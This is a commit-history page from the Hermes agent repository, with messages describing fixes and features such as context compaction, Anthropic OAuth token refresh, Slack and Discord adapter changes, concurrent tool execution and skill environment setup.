Compare commits

...

1464 Commits

Author SHA1 Message Date
teknium1
a1a90f3f10 feat: require runway before prune-only compaction
Make prune-first compression cache-aware by only accepting prune-only
compaction when it gets comfortably below threshold. If pruning merely
dips under threshold, fall through to the existing summary compaction
so we avoid frequent near-threshold recompressions.

Tests cover both the conservative fallback and the prune-only fast path.
2026-03-13 21:46:09 -07:00
teknium1
55729670be docs: add cache-aware compaction design note 2026-03-13 21:46:03 -07:00
teyrebaz33
119bad65fc feat: prune old tool outputs before context compaction
Port the useful part of PR #588 onto current main without regressing
summary role alternation or the centralized call_llm-based summary path.

This adds a prune-first compression pass that:
- protects recent tool outputs with adaptive thresholds
- never prunes key tool outputs like read_file/memory/clarify
- skips the LLM summary call entirely when pruning alone is enough
- keeps head/tail protected windows untouched

Tests cover prune-only compaction, protected tools, and tail protection.

Co-authored-by: teyrebaz33 <hakanerten02@hotmail.com>
2026-03-13 21:21:28 -07:00
teknium1
153ccbfd61 fix: strip user: prefix from Discord allowed user IDs in onboarding
Users sometimes paste Discord IDs with prefixes like 'user:123456',
'<@123456>', or '<@!123456>' from Discord's UI or third-party tools.
This caused auth failures since the allowlist contained 'user:123' but
the actual user_id from messages was just '123'.

Fixes:
- Added _clean_discord_id() helper in discord.py to strip common prefixes
- Applied sanitization at runtime when parsing DISCORD_ALLOWED_USERS env var
- Applied sanitization in hermes setup and hermes gateway setup input flows
- Handles user:, <@>, and <@!> prefix formats
2026-03-13 09:35:46 -07:00
Teknium
e8c9bcea2b fix: prevent model/provider mismatch when switching providers during active gateway (#1183)
When _update_config_for_provider() writes the new provider and base_url
to config.yaml, the gateway (which re-reads config per-message) can pick
up the change before model selection completes. This causes the old model
name (e.g. 'anthropic/claude-opus-4.6') to be sent to the new provider's
API (e.g. MiniMax), which fails.

Changes:
- _update_config_for_provider() now accepts an optional default_model
  parameter. When provided and the current model.default is empty or
  uses OpenRouter format (contains '/'), it sets a safe default model
  for the new provider.
- All setup.py callers for direct-API providers (zai, kimi, minimax,
  minimax-cn, anthropic) now pass a provider-appropriate default model.
- _setup_provider_model_selection() now validates the 'Keep current'
  choice: if the current model uses OpenRouter format and wouldn't work
  with the new provider, it warns and switches to the provider's first
  default model instead of silently keeping the incompatible name.

Reported by a user on Home Assistant whose gateway started sending
'anthropic/claude-opus-4.6' to MiniMax's API after running hermes setup.
2026-03-13 09:03:48 -07:00
Teknium
7aea893b5a Merge pull request #1181 from NousResearch/hermes/hermes-294208e8
fix(skills): use generic example in 1password op run snippet
2026-03-13 08:56:16 -07:00
teknium1
938edc6466 fix(skills): use generic example in 1password op run snippet
Replace OPENAI_API_KEY with DB_PASSWORD to avoid implying the
skill is OpenAI-related.
2026-03-13 08:56:06 -07:00
Teknium
b8b45bfb77 feat(discord): add /thread command, auto_thread config, and media metadata fix (#1178)
- Add /thread slash command that creates a Discord thread and starts a
  new Hermes session in it. The starter message (if provided) becomes
  the first user input in the new session.
- Add discord.auto_thread config option (DISCORD_AUTO_THREAD env var):
  when enabled, every message in a text channel automatically creates
  a thread, allowing parallel isolated sessions.
- Fix Discord media method signatures to accept metadata kwarg
  (send_voice, send_image_file, send_image) — prevents TypeError
  when the base adapter passes platform metadata.
- Fix test mock isolation: add app_commands and ForumChannel to
  discord mocks so tests pass in full-suite runs.

Based on PRs #866 and #1109 by insecurejezza, modified per review:
removed /channel command (unsafe), added auto_thread feature,
made /thread dispatch new sessions.

Co-authored-by: insecurejezza <insecurejezza@users.noreply.github.com>
2026-03-13 08:52:54 -07:00
Teknium
d425901bae fix: report cronjob tool as available in hermes doctor
Set HERMES_INTERACTIVE=1 via setdefault in run_doctor() so CLI-gated
tool checks (like cronjob) see the same context as the interactive CLI.

Cherry-picked from PR #895 by @stablegenius49.

Fixes #878

Co-authored-by: stablegenius49 <stablegenius49@users.noreply.github.com>
2026-03-13 08:51:45 -07:00
Teknium
bcefc2a475 fix(skills): improve 1password skill — env var prompting, auth docs, broken examples
fix(skills): improve 1password skill — env var prompting, auth docs, broken examples
2026-03-13 08:47:08 -07:00
teknium1
9667c71df8 fix(skills): improve 1password skill — env var prompting, auth docs, broken examples
Follow-up to PR #883 (arceus77-7):

- Add setup.collect_secrets for OP_SERVICE_ACCOUNT_TOKEN so the skill
  prompts users to configure their token on first load
- Fix broken code examples: garbled op run export line, truncated
  secret reference in cli-examples.md
- Add Authentication Methods section documenting all 3 auth flows
  (service account, desktop app, connect server) with service account
  recommended for Hermes
- Clarify tmux pattern is only needed for desktop app flow, not
  service account token flow
- Credit original author (arceus77-7) in frontmatter
- Add DESCRIPTION.md for security/ category

Co-authored-by: arceus77-7 <arceus77-7@users.noreply.github.com>
2026-03-13 08:46:49 -07:00
Teknium
808d81f921 Merge PR #883: feat(skills): add official optional 1password skill
feat(skills): add official optional 1password skill
2026-03-13 08:45:04 -07:00
Teknium
9f676d1394 feat(skills): add bundled opencode autonomous-agent skill
Cherry-picked from PR #880 by @arceus77-7, rebased onto current main with corrections.

Adds opencode skill under skills/autonomous-ai-agents/ with:
- One-shot opencode run workflow
- Interactive/background TUI session workflow
- PR review workflow (including opencode pr command)
- Parallel work patterns
- TUI keybindings reference
- Session/cost management
- Smoke verification

Tested with OpenCode v1.2.25. Fixed /exit bug (not a valid command),
added missing flags (--file, --thinking, --variant), expanded docs.

Co-authored-by: arceus77-7 <261276524+arceus77-7@users.noreply.github.com>
2026-03-13 08:39:21 -07:00
Teknium
02a819b16e feat(delegate): add observability metadata to subagent results (#1175)
* fix: Home Assistant event filtering now closed by default

Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.

* docs: update Home Assistant integration documentation

- homeassistant.md: Fix event filtering docs to reflect closed-by-default
  behavior. Add watch_all option. Replace Python dict config example with
  YAML. Fix defaults table (was incorrectly showing 'all'). Add required
  configuration warning admonition.
- environment-variables.md: Add HASS_TOKEN and HASS_URL to Messaging section.
- messaging/index.md: Add Home Assistant to description, architecture
  diagram, platform toolsets table, and Next Steps links.

* fix(terminal): strip provider env vars from background and PTY subprocesses

Extends the env var blocklist from #1157 to also cover the two remaining
leaky paths in process_registry.py:

- spawn_local() PTY path (line 156)
- spawn_local() background Popen path (line 197)

Both were still using raw os.environ, leaking provider vars to background
processes and interactive PTY sessions. Now uses the same dynamic
_HERMES_PROVIDER_ENV_BLOCKLIST from local.py.

Explicit env_vars passed to spawn_local() still override the blocklist,
matching the existing behavior for callers that intentionally need these.

Gap identified by PR #1004 (@PeterFile).

* feat(delegate): add observability metadata to subagent results

Enrich delegate_task results with metadata from the child AIAgent:

- model: which model the child used
- exit_reason: completed | interrupted | max_iterations
- tokens.input / tokens.output: token counts
- tool_trace: per-tool-call trace with byte sizes and ok/error status

Tool trace uses tool_call_id matching to correctly pair parallel tool
calls with their results, with a fallback for messages without IDs.

Cherry-picked from PR #872 by @omerkaz, with fixes:
- Fixed parallel tool call trace pairing (was always updating last entry)
- Removed redundant 'iterations' field (identical to existing 'api_calls')
- Added test for parallel tool call trace correctness

Co-authored-by: omerkaz <omerkaz@users.noreply.github.com>

---------

Co-authored-by: omerkaz <omerkaz@users.noreply.github.com>
2026-03-13 08:07:12 -07:00
Teknium
4644f71faf Merge pull request #1173 from NousResearch/hermes/hermes-4cde5efa
fix(cron): use atomic write in save_job_output to prevent data loss on crash
2026-03-13 08:05:52 -07:00
alireza78a
9a7ed81b4b fix(cron): use atomic write in save_job_output to prevent data loss on crash
save_job_output() used bare open('w') which truncates the output file
immediately. A crash or OOM kill between truncation and the completed
write would silently wipe the job output.

Write now goes to a temp file first, then os.replace() swaps it
atomically — matching the existing save_jobs() pattern in the same file.
Preserves _secure_file() permissions and uses safe cleanup on error.

Cherry-picked from PR #874 by alireza78a, rebased onto current main
with conflict resolution and fixes:
- Kept _secure_dir/_secure_file security calls from PR #757
- Used except BaseException (not bare except) to match save_jobs pattern
- Wrapped os.unlink in try/except OSError to avoid masking errors

Co-authored-by: alireza78a <alireza78a@users.noreply.github.com>
2026-03-13 08:04:36 -07:00
Teknium
646b4ec533 fix(terminal): strip provider env vars from background and PTY subprocesses (#1172)
* fix: Home Assistant event filtering now closed by default

Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.

* docs: update Home Assistant integration documentation

- homeassistant.md: Fix event filtering docs to reflect closed-by-default
  behavior. Add watch_all option. Replace Python dict config example with
  YAML. Fix defaults table (was incorrectly showing 'all'). Add required
  configuration warning admonition.
- environment-variables.md: Add HASS_TOKEN and HASS_URL to Messaging section.
- messaging/index.md: Add Home Assistant to description, architecture
  diagram, platform toolsets table, and Next Steps links.

* fix(terminal): strip provider env vars from background and PTY subprocesses

Extends the env var blocklist from #1157 to also cover the two remaining
leaky paths in process_registry.py:

- spawn_local() PTY path (line 156)
- spawn_local() background Popen path (line 197)

Both were still using raw os.environ, leaking provider vars to background
processes and interactive PTY sessions. Now uses the same dynamic
_HERMES_PROVIDER_ENV_BLOCKLIST from local.py.

Explicit env_vars passed to spawn_local() still override the blocklist,
matching the existing behavior for callers that intentionally need these.

Gap identified by PR #1004 (@PeterFile).
2026-03-13 07:54:46 -07:00
Muhammet Eren Karakuş
c92507e53d fix(terminal): strip Hermes provider env vars from subprocess environment (#1157)
Terminal subprocesses inherit OPENAI_BASE_URL and other provider env
vars loaded from ~/.hermes/.env, silently misrouting external CLIs
like codex.  Build a blocklist dynamically from the provider registry
so new providers are automatically covered.  Callers that truly need
a blocked var can opt in via the _HERMES_FORCE_ prefix.

Closes #1002

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-13 07:52:03 -07:00
Teknium
4b53ecb1c7 docs: update Home Assistant integration documentation (#1170)
* fix: Home Assistant event filtering now closed by default

Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.

* docs: update Home Assistant integration documentation

- homeassistant.md: Fix event filtering docs to reflect closed-by-default
  behavior. Add watch_all option. Replace Python dict config example with
  YAML. Fix defaults table (was incorrectly showing 'all'). Add required
  configuration warning admonition.
- environment-variables.md: Add HASS_TOKEN and HASS_URL to Messaging section.
- messaging/index.md: Add Home Assistant to description, architecture
  diagram, platform toolsets table, and Next Steps links.
2026-03-13 07:45:06 -07:00
Teknium
61531396a0 fix: Home Assistant event filtering now closed by default (#1169)
Previously, when no watch_domains or watch_entities were configured,
ALL state_changed events passed through to the agent, causing users
to be flooded with notifications for every HA entity change.

Now events are dropped by default unless the user explicitly configures:
- watch_domains: list of domains to monitor (e.g. climate, light)
- watch_entities: list of specific entity IDs to monitor
- watch_all: true (new option — opt-in to receive all events)

A warning is logged at connect time if no filters are configured,
guiding users to set up their HA platform config.

All 49 gateway HA tests + 52 HA tool tests pass.
2026-03-13 07:40:38 -07:00
Teknium
6235fdde75 fix: raise session hygiene threshold from 50% to 85%
Session hygiene was firing at the same threshold (50%) as the agent's
own context compressor, causing premature compression on every turn
in long gateway sessions (especially Telegram).

Hygiene is a safety net for pathologically large sessions that would
cause API failures — it should NOT be doing normal compression work.
The agent's own compressor handles that during its tool loop with
accurate real token counts from the API.

Changes:
- Default hygiene threshold: 0.50 → 0.85 (fires only when truly large)
- Hygiene threshold is now independent of compression.threshold config
  (that setting controls the agent's compressor, not the pre-agent safety net)
- Removed env var override for hygiene threshold (CONTEXT_COMPRESSION_THRESHOLD
  still controls the agent's own compressor)
2026-03-13 04:17:45 -07:00
Teknium
8f8dd83443 fix: sync session_id after mid-run context compression
Critical bug: when the agent's context compressor fires during a tool
loop (_compress_context), it creates a new session_id and writes the
compressed messages there. But the gateway's session_entry still pointed
to the old session_id. On the next message, load_transcript() loaded
the stale pre-compression transcript, causing:

- Context bloat returning every turn
- Repeated compression cycles
- Loss of carefully compressed context

Fix: after run_conversation() returns, check if the agent's session_id
changed (compression split) and sync it back to the session store entry.
Also pass the effective session_id in the result dict so _handle_message
writes transcript entries to the correct session.

This affects ALL gateway adapters, not just webhook.
2026-03-13 04:14:35 -07:00
teknium1
06a5cc484c fix: improve gateway secret capture guidance message
The old message referenced 'hermes setup' which doesn't handle
skill-specific env vars. Updated to direct users to load the skill
in the local CLI (which triggers the secure prompt) or add the key
to ~/.hermes/.env manually.
2026-03-13 04:10:22 -07:00
Teknium
0157253145 Merge pull request #1152 from NousResearch/hermes/hermes-f47f71c0
feat: concurrent tool execution with ThreadPoolExecutor
2026-03-13 03:20:38 -07:00
Teknium
76a654f949 Merge pull request #912 from NousResearch/fix/packaging-bugs
fix: add missing packages to setuptools config
2026-03-13 03:15:54 -07:00
Teknium
0a88b133c2 Merge branch 'main' into fix/packaging-bugs 2026-03-13 03:15:45 -07:00
Teknium
98b55360a9 Merge pull request #1153 from NousResearch/hermes/hermes-42bc21fb
feat: secure skill env setup on load (core #688)
2026-03-13 03:14:34 -07:00
kshitijk4poor
ccfbf42844 feat: secure skill env setup on load (core #688)
When a skill declares required_environment_variables in its YAML
frontmatter, missing env vars trigger a secure TUI prompt (identical
to the sudo password widget) when the skill is loaded. Secrets flow
directly to ~/.hermes/.env, never entering LLM context.

Key changes:
- New required_environment_variables frontmatter field for skills
- Secure TUI widget (masked input, 120s timeout)
- Gateway safety: messaging platforms show local setup guidance
- Legacy prerequisites.env_vars normalized into new format
- Remote backend handling: conservative setup_needed=True
- Env var name validation, file permissions hardened to 0o600
- Redact patterns extended for secret-related JSON fields
- 12 existing skills updated with prerequisites declarations
- ~48 new tests covering skip, timeout, gateway, remote backends
- Dynamic panel widget sizing (fixes hardcoded width from original PR)

Cherry-picked from PR #723 by kshitijk4poor, rebased onto current main
with conflict resolution.

Fixes #688

Co-authored-by: kshitijk4poor <kshitijk4poor@users.noreply.github.com>
2026-03-13 03:14:04 -07:00
Teknium
c097e56142 Merge pull request #1149 from NousResearch/hermes/hermes-d28bf447
feat: Agentic On-Policy Distillation (OPD) environment
2026-03-13 03:09:43 -07:00
teknium1
ef3f3f9c08 fix: normalize dot-versioned model names for Anthropic API
anthropic/claude-opus-4.6 (OpenRouter format) was being sent as
claude-opus-4.6 to the Anthropic API, which expects claude-opus-4-6
(hyphens, not dots).

normalize_model_name() now converts dots to hyphens after stripping
the provider prefix, matching Anthropic's naming convention.

Fixes 404: 'model: claude-opus-4.6 was not found'
2026-03-13 03:08:14 -07:00
teknium1
5d0d5b191c feat: concurrent tool execution with ThreadPoolExecutor
When the model returns multiple tool calls in a single response, they are
now executed concurrently using a thread pool instead of sequentially.
This significantly reduces wall-clock time when multiple independent tools
are batched (e.g. parallel web_search, read_file, terminal calls).

Architecture:
- _execute_tool_calls() dispatches to sequential or concurrent path
- Single tool calls and batches containing 'clarify' use sequential path
- Multiple non-interactive tools use ThreadPoolExecutor (max 8 workers)
- Results are collected and appended to messages in original order
- _invoke_tool() extracted as shared tool invocation helper

Safety:
- Pre-flight interrupt check skips all tools if interrupted
- Per-tool exception handling: one failure doesn't crash the batch
- Result truncation (100k char limit) applied per tool
- Budget pressure injection after all tools complete
- Checkpoints taken before file-mutating tools
- CLI spinner shows batch progress, then per-tool completion messages

Tests: 10 new tests covering dispatch logic, ordering, error handling,
interrupt behavior, truncation, and _invoke_tool routing.
2026-03-13 02:51:51 -07:00
teknium1
1a5f31d631 feat: add agentic on-policy distillation (OPD) environment
First Atropos environment to populate distill_token_ids / distill_logprobs
on ScoredDataGroup, enabling on-policy distillation training.

Based on OpenClaw-RL (Princeton, arXiv:2603.10165):
- Extracts hindsight hints from next-state signals (tool results, errors)
- Uses LLM judge with majority voting for hint extraction
- Scores student tokens under hint-enhanced distribution via get_logprobs
- Packages teacher's top-K predictions as distillation targets

Architecture:
- AgenticOPDEnv extends HermesAgentBaseEnv
- Overrides collect_trajectories to add OPD pipeline after standard rollouts
- Uses Atropos's built-in get_logprobs (VLLM prompt_logprobs) for teacher scoring
- No external servers needed — same VLLM backend handles both rollouts and scoring

Task: Coding problems with test verification (8 built-in tasks, HF dataset support)
Reward: correctness (0.7) + efficiency (0.15) + tool usage (0.15)
OPD: Per-turn hint extraction → enhanced prompt → teacher top-K logprobs

Configurable: opd_enabled, distill_topk, prm_votes, hint truncation length
Metrics: opd/mean_hints_per_rollout, opd/mean_turns_scored, opd/hint_rate
2026-03-13 02:45:08 -07:00
Teknium
34c8a5fe8b Merge pull request #1147 from NousResearch/hermes/hermes-6ec3b1a9
fix: separate Anthropic OAuth tokens from API keys
2026-03-13 02:13:47 -07:00
kshitijk4poor
bb3f5ed32a fix: separate Anthropic OAuth tokens from API keys
Persist OAuth/setup tokens in ANTHROPIC_TOKEN instead of ANTHROPIC_API_KEY.
Reserve ANTHROPIC_API_KEY for regular Console API keys.

Changes:
- anthropic_adapter: reorder resolve_anthropic_token() priority —
  ANTHROPIC_TOKEN first, ANTHROPIC_API_KEY as legacy fallback
- config: add save_anthropic_oauth_token() / save_anthropic_api_key() helpers
  that clear the opposing slot to prevent priority conflicts
- config: show_config() prefers ANTHROPIC_TOKEN for display
- setup: OAuth login and pasted setup-tokens write to ANTHROPIC_TOKEN
- setup: API key entry writes to ANTHROPIC_API_KEY and clears ANTHROPIC_TOKEN
- main: same fixes in _run_anthropic_oauth_flow() and _model_flow_anthropic()
- main: _has_any_provider_configured() checks ANTHROPIC_TOKEN
- doctor: use _is_oauth_token() for correct auth method validation
- runtime_provider: updated error message
- run_agent: simplified client init to use resolve_anthropic_token()
- run_agent: updated 401 troubleshooting messages
- status: prefer ANTHROPIC_TOKEN in status display
- tests: updated priority test, added persistence helper tests

Cherry-picked from PR #1141 by kshitijk4poor, rebased onto current main
with unrelated changes (web_policy config, blocklist CLI) removed.

Co-authored-by: kshitijk4poor <kshitijk4poor@users.noreply.github.com>
2026-03-13 02:09:52 -07:00
teknium1
f562d97f13 Enhance CLI output formatting with RichText support
- Updated command output handling to use RichText for ANSI formatting.
- Improved response display in chat console with RichText integration.
- Ensured fallback for empty command outputs with a clear message.
2026-03-13 02:05:30 -07:00
Teknium
31afb31108 Merge pull request #1135 from NousResearch/hermes/hermes-6ec3b1a9
feat(skills): add NeuroSkill BCI integration as optional built-in skill
2026-03-13 01:49:00 -07:00
teknium1
8a3e7e15c6 feat(skills): add NeuroSkill BCI integration as optional built-in skill
Complete rewrite of the neuroskill-bci skill based on actual source material
from the NeuroSkill desktop app and NeuroLoop CLI repos. Supersedes PR #708.

Key improvements over #708:
- All CLI commands verified against actual NeuroSkill/NeuroLoop source
- Added --json flag usage throughout (critical for reliable parsing)
- Fixed metric formulas: Focus = σ(β/(α+θ)), Relaxation = σ(α/(β+θ))
- Scores are 0-1 scale (not 0-100 as in #708)
- Added all 40+ metrics: FAA, TAR, BAR, TBR, APF, SNR, coherence,
  consciousness (LZC, wakefulness, integration), complexity (PE, HFD, DFA),
  cardiac (RMSSD, SDNN, pNN50, LF/HF, stress index, SpO2),
  motion (stillness, blinks, jaw clenches, nods, shakes)
- Added all missing CLI subcommands: session, search-labels, interactive,
  listen, umap, calibrate, timer, notify, raw
- Protocols sourced from actual NeuroLoop protocol repertoire (70+)
  organized by category (attention, stress, emotional, sleep, somatic,
  digital, dietary, motivation)
- Added full WebSocket/HTTP API reference with all endpoints and
  JSON response formats
- Fixed gamma range: 30-50 Hz (not 30-100)
- Added signal quality per electrode with thresholds
- Added composite state patterns (flow, fatigue, anxiety, creative, etc.)
- Added ZUNA embedding documentation
- Placed as optional built-in skill (not bundled by default)

Files:
- optional-skills/health/DESCRIPTION.md (new category)
- optional-skills/health/neuroskill-bci/SKILL.md (main skill)
- optional-skills/health/neuroskill-bci/references/metrics.md
- optional-skills/health/neuroskill-bci/references/protocols.md
- optional-skills/health/neuroskill-bci/references/api.md

Refs: #694, #708
2026-03-12 21:56:07 -07:00
Teknium
d24bcad90b fix: Anthropic OAuth — beta header, token refresh, config contamination, reauthentication (#1132)
Fixes Anthropic OAuth/subscription authentication end-to-end:

Auth failures (401 errors):
- Add missing 'claude-code-20250219' beta header for OAuth tokens. Both
  clawdbot and OpenCode include this alongside 'oauth-2025-04-20' — without
  it, Anthropic's API rejects OAuth tokens with 401 authentication errors.
- Fix _fetch_anthropic_models() to use canonical beta headers from
  _COMMON_BETAS + _OAUTH_ONLY_BETAS instead of hardcoding.

Token refresh:
- Add _refresh_oauth_token() — when Claude Code credentials from
  ~/.claude/.credentials.json are expired but have a refresh token,
  automatically POST to console.anthropic.com/v1/oauth/token to get
  a new access token. Uses the same client_id as Claude Code / OpenCode.
- Add _write_claude_code_credentials() — writes refreshed tokens back
  to ~/.claude/.credentials.json, preserving other fields.
- resolve_anthropic_token() now auto-refreshes expired tokens before
  returning None.

Config contamination:
- Anthropic's _model_flow_anthropic() no longer saves base_url to config.
  Since resolve_runtime_provider() always hardcodes Anthropic's URL, the
  stale base_url was contaminating other providers when users switched
  without re-running 'hermes model' (e.g., Codex hitting api.anthropic.com).
- _update_config_for_provider() now pops base_url when passed empty string.
- Same fix in setup.py.

Flow/UX (hermes model command):
- CLAUDE_CODE_OAUTH_TOKEN env var now checked in credential detection
- Reauthentication option when existing credentials found
- run_oauth_setup_token() runs 'claude setup-token' as interactive
  subprocess, then auto-detects saved credentials
- Clean has_creds/needs_auth flow in both main.py and setup.py

Tests (14 new):
- Beta header assertions for claude-code-20250219
- Token refresh: successful refresh with credential writeback, failed
  refresh returns None, no refresh token returns None
- Credential writeback: new file creation, preserving existing fields
- Auto-refresh integration in resolve_anthropic_token()
- CLAUDE_CODE_OAUTH_TOKEN fallback, credential file auto-discovery
- run_oauth_setup_token() (5 scenarios)
2026-03-12 20:45:50 -07:00
Teknium
6ceae61a56 Merge pull request #1130 from NousResearch/hermes/hermes-c877bdeb
fix(anthropic): skip thinking params for Haiku models
2026-03-12 19:35:13 -07:00
teknium1
638136e353 fix(anthropic): skip thinking params for Haiku models
Haiku models don't support extended thinking at all. Without this
guard, claude-haiku-4-5-20251001 would receive type=enabled +
budget_tokens and return a 400 error.

Incorporates the fix from PR #1127 (by frizynn) on top of #1128's
adaptive thinking refactor.

Verified live with Claude Code OAuth:
  claude-opus-4-6       → adaptive thinking ✓
  claude-haiku-4-5      → no thinking params ✓
  claude-sonnet-4       → enabled thinking ✓
2026-03-12 19:34:55 -07:00
Teknium
8de14c5624 fix(doctor): treat configured honcho as available (#962)
fix(doctor): treat configured honcho as available
2026-03-12 19:34:37 -07:00
PeterFile
2a1f92ef4a fix(doctor): treat configured honcho as available
Doctor-only override so honcho shows as available when configured,
even outside a live agent session. Runtime tool gate unchanged.

Cherry-picked from PR #962 by PeterFile, rebased onto current main
(post-#736 merge) with conflict resolution.

Fixes #961

Co-authored-by: PeterFile <PeterFile@users.noreply.github.com>
2026-03-12 19:34:19 -07:00
Teknium
15911d70c0 Merge pull request #1128 from ASRagab/fix/adaptive-thinking-budget-tokens
fix: use adaptive thinking without budget_tokens for Claude 4.6 models
2026-03-12 19:32:46 -07:00
Ahmad Ragab
3dc148ab6f fix: use adaptive thinking without budget_tokens for Claude 4.6 models
For Claude 4.6 models (Opus and Sonnet), the Anthropic API rejects
budget_tokens when thinking.type is 'adaptive'. This was causing a
400 error: 'thinking.adaptive.budget_tokens: Extra inputs are not
permitted'.

Changes:
- Send thinking: {type: 'adaptive'} without budget_tokens for 4.6
- Move effort control to output_config: {effort: ...} per Anthropic docs
- Map Hermes effort levels to Anthropic effort levels (xhigh->max, etc.)
- Narrow adaptive detection to 4.6 models only (4.5 still uses manual)
- Add tests for adaptive thinking on 4.6 and manual thinking on pre-4.6

Fixes #1126
2026-03-13 03:21:13 +01:00
Teknium
9dfa81ab4b Merge pull request #1125 from NousResearch/hermes/hermes-c877bdeb
fix(anthropic): add diagnostic output on 401 auth failures
2026-03-12 19:15:21 -07:00
teknium1
e5b8e06037 fix(anthropic): add diagnostic output on 401 auth failures
When Anthropic returns 401 and credential refresh doesn't help,
now prints actionable troubleshooting info:
- Which auth method was used (Bearer vs x-api-key)
- Token prefix for debugging
- Common fixes (stale ANTHROPIC_API_KEY, verify key, refresh login)
- How to clear stale keys
2026-03-12 19:09:06 -07:00
Teknium
a282322845 Merge pull request #1121 from 0xbyt4/fix/anthropic-adapter-issues
fix: anthropic adapter — max_tokens, fallback crash, proxy base_url
2026-03-12 19:07:06 -07:00
Teknium
475dd58a8e Merge PR #736: feat(honcho): async writes, memory modes, session title integration, setup CLI
Authored by erosika. Builds on #38 and #243.

Adds async write support, configurable memory modes, context prefetch pipeline,
4 new Honcho tools (honcho_context, honcho_profile, honcho_search, honcho_conclude),
full 'hermes honcho' CLI, session strategies, AI peer identity, recallMode A/B,
gateway lifecycle management, and comprehensive docs.

Cherry-picks fixes from PRs #831/#832 (adavyas).

Co-authored-by: erosika <erosika@users.noreply.github.com>
Co-authored-by: adavyas <adavyas@users.noreply.github.com>
2026-03-12 19:05:11 -07:00
Teknium
28ffa8e693 fix: slack file upload fallback loses thread context (#1122)
fix: slack file upload fallback loses thread context
2026-03-12 18:56:27 -07:00
Teknium
e53dfd88bb Merge pull request #1123 from 0xbyt4/fix/setup-is-coding-plan-nameError
Clean fix — removes dead code that crashed with NameError on is_coding_plan. The generic _setup_provider_model_selection() already handles all affected providers.
2026-03-12 18:55:59 -07:00
0xbyt4
93c3a1a9c9 fix(setup): remove dead code causing is_coding_plan NameError crash
Remove 50 lines of unreachable duplicate model selection logic in
setup_model_provider() for zai/kimi-coding/minimax/minimax-cn providers.
The code referenced undefined `is_coding_plan` variable, crashing setup.
_setup_provider_model_selection() already handles these providers correctly
via _DEFAULT_PROVIDER_MODELS dict.
2026-03-13 04:42:26 +03:00
0xbyt4
064c66df8c fix: slack file upload fallback loses thread context
Fallback paths in send_image_file, send_video, and send_document called
super() without metadata, causing replies to appear outside the thread
when file upload fails. Use self.send() with metadata instead to preserve
thread_ts context.
2026-03-13 04:26:27 +03:00
0xbyt4
22479b053c fix: anthropic adapter — max_tokens ignored, fallback crash, proxy base_url filtered
- Pass self.max_tokens to build_anthropic_kwargs instead of hardcoded None
- Add anthropic case to _try_activate_fallback (was only handling openai-codex)
- Remove 'anthropic in base_url' filter that blocked custom proxy URLs
2026-03-13 04:22:16 +03:00
Teknium
a1c4431479 Merge pull request #1062 from NousResearch/feat/optional-rl-training
feat: make tinker-atropos RL training fully optional
2026-03-12 18:02:44 -07:00
Teknium
3bc933586a fix: Slack MAX_MESSAGE_LENGTH + typing indicator via assistant.threads.setStatus (#1117)
fix: Slack MAX_MESSAGE_LENGTH 3900 → 39000
2026-03-12 17:53:49 -07:00
Teknium
0219abfeed Merge pull request #1097 from NousResearch/hermes/hermes-c877bdeb
feat: native Anthropic provider with Claude Code credential auto-discovery
2026-03-12 17:49:39 -07:00
teknium1
e976879cf2 merge: resolve conflicts with main (URL update to hermes-agent.nousresearch.com) 2026-03-12 17:49:26 -07:00
teknium1
319e6615c3 fix: Slack MAX_MESSAGE_LENGTH + typing indicator via assistant.threads.setStatus
- Increase MAX_MESSAGE_LENGTH from 3,900 to 39,000 (Slack API allows 40k)
- Implement real typing indicator using assistant.threads.setStatus API
  - Shows 'BotName is thinking...' next to the bot name in threads
  - Auto-clears when the bot sends a reply
  - Requires assistant:write or chat:write scope
  - Falls back silently if scope unavailable (reactions still work)
- 4 new tests for typing indicator
2026-03-12 17:46:53 -07:00
teknium1
7f7282c78d fix(anthropic): guard memory flush tool_calls extraction for Anthropic response format
The memory flush path extracted tool_calls from the response assuming
OpenAI format (response.choices[0].message.tool_calls). When using
the Anthropic client directly (aux unavailable), the response is an
Anthropic Message object which has no .choices attribute. Now uses
normalize_anthropic_response() to extract tool_calls correctly.
2026-03-12 17:35:01 -07:00
teknium1
809abd60bf docs: add Anthropic provider to all documentation pages
- quickstart.md: Add Anthropic to the provider comparison table
- configuration.md: Add Anthropic to provider list table, add full
  'Anthropic (Native)' section with three auth methods (API key,
  setup-token, Claude Code auto-detect), config.yaml example,
  and provider alias tip
- environment-variables.md: Add ANTHROPIC_API_KEY, ANTHROPIC_TOKEN,
  CLAUDE_CODE_OAUTH_TOKEN to LLM Providers table; add 'anthropic'
  to HERMES_INFERENCE_PROVIDER values list
2026-03-12 17:28:36 -07:00
teknium1
aaaba78126 fix(anthropic): final polish — tool ID sanitization, crash guards, temp=1
Remaining issues from deep scan:

Adapter (agent/anthropic_adapter.py):
- Add _sanitize_tool_id() — Anthropic requires IDs matching [a-zA-Z0-9_-],
  now strips invalid chars and ensures non-empty (both tool_use and tool_result)
- Empty tool result content → '(no output)' placeholder (Anthropic rejects empty)
- Set temperature=1 when thinking type='enabled' on older models (required)
- normalize_model_name now case-insensitive for 'Anthropic/' prefix
- Fix stale docstrings referencing only ~/.claude/.credentials.json

Agent loop (run_agent.py):
- Guard memory flush path (line ~2684) — was calling self.client.chat.completions
  which is None in anthropic_messages mode. Now routes through Anthropic client.
- Guard summary generation path (line ~3171) — same crash when reaching
